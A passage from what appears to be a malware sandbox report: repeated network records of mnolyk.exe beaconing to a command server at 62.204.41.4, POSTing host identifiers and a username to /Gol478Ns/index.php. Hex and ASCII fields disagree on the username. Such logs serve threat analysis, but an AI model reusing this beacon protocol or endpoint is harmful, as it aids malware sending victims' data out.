                                                                      636 | 192.168.2.7 | 50331 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:52.497858047 CET | 751 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:52.560650110 CET | 751 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      637 | 192.168.2.7 | 50332 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:52.732683897 CET | 752 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:52.796153069 CET | 752 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      638 | 192.168.2.7 | 50333 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:52.974040031 CET | 753 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:53.042773962 CET | 753 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      639 | 192.168.2.7 | 50334 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:53.217370987 CET | 754 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:53.283672094 CET | 754 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      64 | 192.168.2.7 | 49759 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:17.049971104 CET | 179 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:17.114705086 CET | 179 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      640 | 192.168.2.7 | 50335 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:53.466996908 CET | 755 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:53.531603098 CET | 755 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      641 | 192.168.2.7 | 50336 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:53.715950966 CET | 756 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:53.781323910 CET | 756 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      642 | 192.168.2.7 | 50337 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:53.984194994 CET | 757 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:54.047347069 CET | 757 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      643 | 192.168.2.7 | 50338 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:54.241583109 CET | 758 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:54.304981947 CET | 758 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      644 | 192.168.2.7 | 50339 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:54.482136011 CET | 759 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:54.546360970 CET | 759 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      645 | 192.168.2.7 | 50340 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:54.719054937 CET | 760 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:54.782201052 CET | 760 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      646 | 192.168.2.7 | 50341 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:54.975800037 CET | 761 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:55.040937901 CET | 761 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      647 | 192.168.2.7 | 50342 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:55.215790033 CET | 762 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:55.279063940 CET | 762 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      648 | 192.168.2.7 | 50343 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:55.462029934 CET | 763 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:55.527674913 CET | 763 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      649 | 192.168.2.7 | 50344 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:55.700525045 CET | 764 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:55.764200926 CET | 764 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      65 | 192.168.2.7 | 49760 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:17.283371925 CET | 180 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:17.347282887 CET | 180 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      650 | 192.168.2.7 | 50345 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:55.938391924 CET | 765 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:56.002156019 CET | 765 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      651 | 192.168.2.7 | 50346 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:56.168423891 CET | 766 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:56.234231949 CET | 766 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      652 | 192.168.2.7 | 50347 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:56.442075968 CET | 767 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:56.517404079 CET | 767 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      653 | 192.168.2.7 | 50348 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:56.686064959 CET | 768 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:56.750740051 CET | 768 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      654 | 192.168.2.7 | 50349 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:56.920228004 CET | 769 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:56.984253883 CET | 769 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      655 | 192.168.2.7 | 50350 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:57.159010887 CET | 770 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:57.224802971 CET | 770 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      656 | 192.168.2.7 | 50351 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:57.406627893 CET | 771 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
